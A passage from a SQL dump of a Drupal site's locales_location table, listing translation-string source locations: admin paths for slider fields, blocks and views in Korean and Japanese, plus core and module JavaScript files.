(1452, 1210, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1453, 1211, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1454, 1212, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1455, 1213, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1456, 1214, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1457, 1215, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1458, 1216, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1459, 1217, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1460, 1218, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1461, 1219, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1462, 1220, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1463, 1221, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1464, 1222, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1465, 1223, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1466, 1224, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1467, 1225, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1468, 1226, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1469, 1227, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1470, 1228, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1471, 1229, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1472, 1230, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1473, 1231, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1474, 1232, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1475, 1233, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1476, 1234, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1477, 1235, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1478, 1236, 'javascript', 'core/modules/file/file.js', '10.6.15'),
(1479, 1237, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img/storage?destinations%5B0%5D%5Broute_name%5D=entity.field_config.node_field_edit_form&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&desti', '9.5.9'),
(1480, 1238, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1481, 1239, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1482, 1240, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1483, 1241, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1484, 1242, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1485, 1243, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9');
INSERT INTO `locales_location` (`lid`, `sid`, `type`, `name`, `version`) VALUES
(1486, 1244, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1487, 1245, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1488, 1246, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1489, 1247, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1490, 1248, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1491, 1249, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1492, 1250, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1493, 1251, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1494, 1252, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1495, 1253, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1496, 1254, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1497, 1255, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1498, 1256, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1499, 1257, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1500, 1258, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1501, 1259, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1502, 1260, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1503, 1261, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1504, 1262, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1505, 1263, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1506, 1264, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1507, 1265, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1508, 1266, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1509, 1267, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1510, 1268, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1511, 1269, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1512, 1270, 'javascript', 'modules/token/js/token.js', '10.6.15'),
(1513, 1271, 'javascript', 'modules/token/js/token.js', '10.6.15'),
(1514, 1272, 'path', '/ko/admin/structure/types/manage/slider/fields/node.slider.field_slider_img?destinations%5B0%5D%5Broute_name%5D=entity.node.field_ui_fields&destinations%5B0%5D%5Broute_parameters%5D%5Bfield_config%5D=node.slider.field_slider_img&destinations%5B0%5D%5Brout', '9.5.9'),
(1515, 1273, 'javascript', 'core/modules/block/js/block.js', '10.6.15'),
(1516, 1274, 'javascript', 'core/modules/block/js/block.js', '10.6.15'),
(1517, 1275, 'javascript', 'core/modules/block/js/block.js', '10.6.15'),
(1518, 1276, 'javascript', 'core/modules/block/js/block.admin.js', '10.6.15'),
(1519, 1277, 'path', '/ko/admin/flush?token=3ChBIpT8bzGJFedVIHMCvVLQr4oc3HylFwaJ2Nyp3IY', '9.5.9'),
(1520, 1278, 'path', '/ko/node/add/slider', '9.5.9'),
(1521, 1279, 'path', '/ko/node/add/slider', '9.5.9'),
(1522, 1280, 'path', '/ko/node/add/slider', '9.5.9'),
(1523, 1281, 'path', '/ko/node/add/slider', '9.5.9'),
(1524, 1282, 'path', '/ko/node/add/slider', '9.5.9'),
(1525, 1283, 'path', '/ko/node/add/slider', '9.5.9'),
(1526, 1284, 'path', '/ko/node/add/slider', '9.5.9'),
(1527, 1285, 'path', '/ko/node/add/slider?element_parents=field_slider_img/widget/0&ajax_form=1&_wrapper_format=drupal_ajax', '9.5.9'),
(1528, 1286, 'path', '/ko/node/add/slider?element_parents=field_slider_img/widget/0&ajax_form=1&_wrapper_format=drupal_ajax', '9.5.9'),
(1529, 1287, 'path', '/ko/node/add/slider', '9.5.9'),
(1530, 405, 'javascript', 'modules/views_slideshow/js/views_slideshow.js', '10.6.15'),
(1531, 1288, 'javascript', 'modules/views_slideshow/js/views_slideshow.js', '10.6.15'),
(1532, 1289, 'javascript', 'modules/views_slideshow/js/views_slideshow.js', '10.6.15'),
(1533, 1290, 'javascript', 'modules/views_slideshow/js/views_slideshow.js', '10.6.15'),
(1534, 1291, 'javascript', 'modules/views_slideshow/js/views_slideshow.js', '10.6.15'),
(1535, 1292, 'javascript', 'modules/views_slideshow/js/views_slideshow.js', '10.6.15'),
(1536, 1293, 'path', '/ko/admin/structure/types/manage/slider', '9.5.9'),
(1537, 1294, 'path', '/ko/admin/structure/types/manage/slider', '9.5.9'),
(1538, 1295, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1539, 1296, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1540, 1297, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1541, 1298, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1542, 1299, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1543, 1300, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1544, 1301, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1545, 1302, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1546, 1303, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1547, 1304, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1548, 1305, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1549, 1306, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1550, 1307, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1551, 1308, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1552, 1309, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1553, 1310, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1554, 1311, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1555, 1312, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1556, 1313, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1557, 1314, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1558, 1315, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1559, 1316, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1560, 1317, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1561, 1318, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1562, 1319, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1563, 1320, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1564, 1321, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1565, 1322, 'path', '/ko/admin/structure/types/manage/slider/display', '9.5.9'),
(1566, 1323, 'path', '/ja/contextual/render', '9.5.9'),
(1567, 1324, 'path', '/ko/admin/structure/block', '9.5.9'),
(1568, 1325, 'path', '/ko/admin/structure/block', '9.5.9'),
(1569, 1326, 'path', '/ko/admin/structure/block', '9.5.9'),
(1570, 1327, 'path', '/ko/admin/structure/block', '9.5.9'),
(1571, 1328, 'path', '/ko/admin/structure/block', '9.5.9'),
(1572, 1329, 'path', '/ko/admin/structure/block', '9.5.9'),
(1573, 1330, 'path', '/ko/admin/structure/block', '9.5.9'),
(1574, 1331, 'path', '/ko/admin/structure/block', '9.5.9'),
(1575, 1332, 'path', '/ko/admin/structure/block', '9.5.9'),
(1576, 1333, 'path', '/ko/admin/structure/block', '9.5.9'),
(1577, 1334, 'path', '/ko/admin/structure/block', '9.5.9'),
(1578, 1335, 'path', '/ko/admin/structure/block', '9.5.9'),
(1579, 1336, 'path', '/ko/admin/structure/block', '9.5.9'),
(1580, 1337, 'path', '/ko/admin/structure/block', '9.5.9'),
(1581, 1338, 'path', '/ko/admin/structure/block', '9.5.9'),
(1582, 1339, 'path', '/ko/admin/structure/block', '9.5.9'),
(1583, 1340, 'path', '/ko/admin/structure/block', '9.5.9'),
(1584, 1341, 'path', '/ko/admin/structure/block', '9.5.9'),
(1585, 1342, 'path', '/ko/admin/structure/block', '9.5.9'),
(1586, 1343, 'path', '/ko/admin/structure/block', '9.5.9'),
(1587, 1344, 'path', '/ko/admin/structure/block', '9.5.9'),
(1588, 1345, 'path', '/ko/admin/structure/block', '9.5.9'),
(1589, 1346, 'path', '/ko/admin/structure/block', '9.5.9'),
(1590, 1347, 'path', '/ko/admin/structure/block', '9.5.9'),
(1591, 1348, 'path', '/ko/admin/structure/block', '9.5.9'),
(1592, 1349, 'path', '/ko/admin/structure/block', '9.5.9'),
(1593, 1350, 'path', '/ko/admin/structure/block', '9.5.9'),
(1594, 1351, 'path', '/ko/admin/structure/block', '9.5.9'),
(1595, 1352, 'path', '/ko/admin/structure/block', '9.5.9'),
(1596, 1353, 'path', '/ko/admin/structure/block', '9.5.9'),
(1597, 1354, 'path', '/ko/admin/structure/block', '9.5.9'),
(1598, 1355, 'path', '/ko/admin/structure/block', '9.5.9'),
(1599, 1356, 'path', '/ko/admin/structure/block/block-content', '9.5.9'),
(1600, 1357, 'path', '/ko/admin/structure/block/block-content', '9.5.9'),
(1601, 1358, 'path', '/ja/block/4/translations/add/en/ja', '9.5.9'),
(1602, 1359, 'path', '/ja/block/4/translations/add/en/ja', '9.5.9'),
(1603, 1360, 'path', '/ja/block/4/translations/add/en/ja', '9.5.9'),
(1604, 1361, 'path', '/ja/block/4/translations/add/en/ja', '9.5.9'),
(1605, 1362, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1606, 1363, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1607, 1364, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1608, 1365, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1609, 1366, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1610, 1367, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1611, 1368, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1612, 1369, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1613, 1370, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1614, 1371, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1615, 1372, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1616, 1373, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1617, 1374, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1618, 1375, 'path', '/ja/admin/structure/block/manage/aboutustitle?destination=/ja/admin/structure/block', '9.5.9'),
(1619, 1376, 'path', '/ko/block/add?destination=/ko/admin/structure/block/block-content', '9.5.9'),
(1620, 1377, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1621, 1378, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1622, 1379, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1623, 1380, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1624, 1381, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1625, 1382, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1626, 1383, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1627, 1384, 'path', '/ko/admin/structure/block/library/new_comet?region=content_prefix&_wrapper_format=drupal_modal', '9.5.9'),
(1628, 1385, 'path', '/ko/admin/structure/block/add/block_content%3A138c3a35-bb2d-41c9-90f2-c410c1e49e2a/new_comet?region=content_prefix', '9.5.9'),
(1629, 1386, 'path', '/ko/admin/structure/block/list/new_comet?block-placement=missionvisiontitle', '9.5.9'),
(1630, 1387, 'path', '/ko/block/add?destination=/ko/admin/structure/block/block-content', '9.5.9'),
(1631, 1388, 'path', '/ko/block/add?destination=/ko/admin/structure/block/block-content', '9.5.9'),
(1632, 1389, 'path', '/ko/block/add?destination=/ko/admin/structure/block/block-content', '9.5.9'),
(1633, 1390, 'path', '/ja/node/8/translations/add/en/ja', '9.5.9'),
(1634, 1391, 'path', '/ja/activities/korea-sngbheaakngttng-welder-kmkng-ghecheaapnnyaarng-aphc-saareaak-lupkiungliusuumaa', '9.5.9'),
(1635, 1392, 'path', '/ko/admin/structure/views', '9.5.9'),
(1636, 1393, 'path', '/ko/admin/structure/views', '9.5.9'),
(1637, 1394, 'path', '/ko/admin/structure/views', '9.5.9'),
(1638, 1395, 'path', '/ko/admin/structure/views', '9.5.9'),
(1639, 1396, 'path', '/ko/admin/structure/views', '9.5.9'),
(1640, 1397, 'path', '/ko/admin/structure/views', '9.5.9'),
(1641, 1398, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1642, 1399, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1643, 1400, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1644, 1401, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1645, 1402, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1646, 1403, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1647, 1404, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1648, 1405, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1649, 1406, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1650, 1407, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1651, 1408, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1652, 1409, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1653, 1410, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1654, 1411, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1655, 1412, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1656, 1413, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1657, 1414, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1658, 1415, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1659, 1416, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1660, 1417, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1661, 1418, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1662, 1419, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1663, 1420, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1664, 1421, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1665, 1422, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1666, 1423, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1667, 1424, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1668, 1425, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1669, 1426, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1670, 1427, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1671, 1428, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1672, 1429, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
(1673, 1430, 'path', '/ko/admin/structure/views/view/activity', '9.5.9'),
